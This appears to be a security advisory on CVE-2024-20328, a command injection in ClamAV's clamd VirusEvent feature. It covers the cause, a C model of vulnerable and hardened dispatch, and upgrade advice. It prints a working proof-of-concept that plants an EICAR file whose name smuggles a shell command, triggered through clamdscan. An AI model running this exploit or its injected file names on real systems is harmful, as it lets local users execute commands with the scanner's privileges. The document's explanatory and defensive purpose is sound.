ClamAV, the open-source antivirus engine, has a command injection vulnerability (CVE-2024-20328) in the VirusEvent feature of its clamd daemon. A local user can cause clamd to execute arbitrary commands with the privileges of the clamd service account, which on most installations means the dedicated clamav user, or root where the daemon is run that way. Affected systems are therefore exposed to unauthorized command execution by anyone who can get a file scanned.

Vulnerability Details

CVE-2024-20328 stems from clamd's unsafe handling of file names in the VirusEvent feature. VirusEvent is a clamd.conf option that runs an administrator-configured command whenever a scan detects malware; the configured command string can carry placeholders that clamd fills in at run time, %v for the detection name and %f for the scanned file's name. A local attacker who can get a file scanned (for example by dropping it in a directory that is scanned on a schedule, or by submitting it to clamd directly) can choose a file name containing shell command sequences. On a system where VirusEvent is configured, that file name is substituted into the command and the attacker can make clamd execute arbitrary commands.

The underlying issue is how clamd builds and runs the VirusEvent command: the configured string is expanded as a single command line and handed to a shell, and the file name is inserted without quoting or escaping. Shell metacharacters in the name, such as `;`, `|`, `&&`, `$(...)` or backticks, are therefore parsed as shell syntax rather than as part of a path, and clamd cannot tell a legitimate file name from one that carries an additional command. Consequently, any system with VirusEvent configured is susceptible to command injection by a local attacker, and the injected command runs with whatever privileges clamd has.
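The pattern in miniature, as an added example that is not ClamAV's own code: a placeholder expander that models "replace %v and %f in the configured command, then hand the result to system()", an audit helper that spots names that would change shell parsing, and a hardened dispatcher that runs a fixed argv with no shell and delivers the detection and file names only through the CLAM_VIRUSEVENT_FILENAME and CLAM_VIRUSEVENT_VIRUSNAME environment variables (the variable names clamd documents for VirusEvent). The notify.sh path, the detection name and the hostile file name are constructed for illustration.

```c
/* Added example: the VirusEvent injection pattern and a hardened alternative.
 * A simplified model, not ClamAV's implementation. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable pattern: expand %v (detection name) and %f (file name) into the
 * configured command string. Whatever is in the file name lands in shell syntax.
 * Returns 0 on success, -1 if the result would not fit in out. */
int expand_virusevent(const char *tmpl, const char *virus, const char *file,
                      char *out, size_t outlen) {
    size_t n = 0;
    for (const char *p = tmpl; *p; p++) {
        const char *ins = NULL;
        if (p[0] == '%' && p[1] == 'v') { ins = virus; p++; }
        else if (p[0] == '%' && p[1] == 'f') { ins = file; p++; }
        if (ins) {
            size_t l = strlen(ins);
            if (n + l >= outlen) return -1;
            memcpy(out + n, ins, l);
            n += l;
        } else {
            if (n + 1 >= outlen) return -1;
            out[n++] = *p;
        }
    }
    out[n] = '\0';
    return 0;
}

/* Audit helper: does a name contain anything that changes shell parsing? */
int has_shell_metachar(const char *s) {
    return strpbrk(s, ";|&$`\"'<>()*?[]{}\n\\ \t") != NULL;
}

/* Vulnerable dispatch: system() runs /bin/sh -c on the expanded string, so a
 * file name such as  x"; id; echo "  escapes the quotes and runs id. */
int run_virusevent_unsafe(const char *tmpl, const char *virus, const char *file) {
    char cmd[1024];
    if (expand_virusevent(tmpl, virus, file, cmd, sizeof cmd) != 0) return -1;
    return system(cmd);
}

/* Hardened dispatch: fixed argv, no shell between clamd and the hook, and the
 * names travel only as environment variables, so they stay single opaque strings.
 * Returns the child's exit status, or -1 on failure. */
int run_virusevent_safe(char *const argv[], const char *virus, const char *file) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        setenv("CLAM_VIRUSEVENT_VIRUSNAME", virus, 1);
        setenv("CLAM_VIRUSEVENT_FILENAME", file, 1);
        execv(argv[0], argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed sample: a typical notification hook and an attacker-chosen name */
    const char *tmpl = "/usr/local/bin/notify.sh \"%v\" \"%f\"";
    const char *virus = "Eicar-Signature";
    const char *file = "/tmp/evil\"; id > /tmp/pwned; echo \"";
    char cmd[1024];
    if (expand_virusevent(tmpl, virus, file, cmd, sizeof cmd) == 0)
        printf("shell would run: %s\n", cmd);
    printf("metacharacters in file name: %d\n", has_shell_metachar(file));
    /* Safe path: the hook sees the name intact, however hostile it looks */
    char *const hook[] = { "/bin/sh", "-c",
        "printf 'hook got: %s\\n' \"$CLAM_VIRUSEVENT_FILENAME\"", NULL };
    return run_virusevent_safe(hook, virus, file);
}
```

The expanded string printed by the demonstration shows the injection directly: the closing quote inside the file name terminates the argument and the rest is parsed as two further shell commands. The safe dispatcher closes that hole structurally rather than by filtering, which is why `has_shell_metachar` is offered only as an audit aid for existing configurations, not as a fix.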

Here is a code snippet exhibiting a sample exploit against the vulnerable VirusEvent feature of ClamAV:

/* Proof-of-Concept exploit for CVE-2024-20328 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>

int main(void) {
  /* Dedicated directory so the scan only touches this PoC */
  const char *dir = "/tmp/cve-2024-20328-poc";
  /* The ';' is a shell metacharacter: once clamd substitutes this name into
     its VirusEvent command, the shell also runs "arbitrary_command" */
  const char *payload = "maliciousfile;arbitrary_command";
  char path[256];
  FILE *f;

  mkdir(dir, 0755);
  snprintf(path, sizeof(path), "%s/%s", dir, payload);
  /* fopen() keeps the ';' in the name instead of letting a shell interpret it
     here. VirusEvent only fires on a detection, so the content is the EICAR
     test string (assumption: any signature hit would do) */
  f = fopen(path, "w");
  if (f == NULL) {
    perror("fopen");
    return 1;
  }
  fputs("X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*", f);
  fclose(f);
  /* VirusEvent is a clamd feature: scan through the daemon with clamdscan
     (not the standalone clamscan); clamd must be able to read the directory */
  system("clamdscan /tmp/cve-2024-20328-poc");

  return 0;
}

To trigger the exploit, compile and run the snippet on a system with an unpatched clamd whose clamd.conf sets a VirusEvent command that receives the file name. Two conditions matter: the scan has to go through the daemon (clamdscan or a direct clamd socket request), because the standalone clamscan has no VirusEvent, and the planted file has to be detected, because the hook only runs on a detection. The injected command then runs as the clamd service account, not as the local user who planted the file.

Mitigation

The ClamAV project has released fixed versions: 1.3.0, 1.2.2 and 1.0.5. Users should upgrade to one of these immediately; the running version can be checked with `clamd --version`. The vendor lists no workaround for CVE-2024-20328, so patching is the only supported remediation.

Please refer to the following official references for more information

1. ClamAV Release Notes: https://www.clamav.net/documents/release-notes
2. ClamAV Security Advisory: https://www.clamav.net/documents/security-advisories

In conclusion, CVE-2024-20328 in ClamAV's VirusEvent feature is a significant threat to affected systems. Because the scanned file's name is placed into a shell command without sanitization, a local attacker can run arbitrary commands with the clamd service account's privileges. ClamAV users should apply the fixed releases without delay.

Timeline

Published on: 03/01/2024 21:15:07 UTC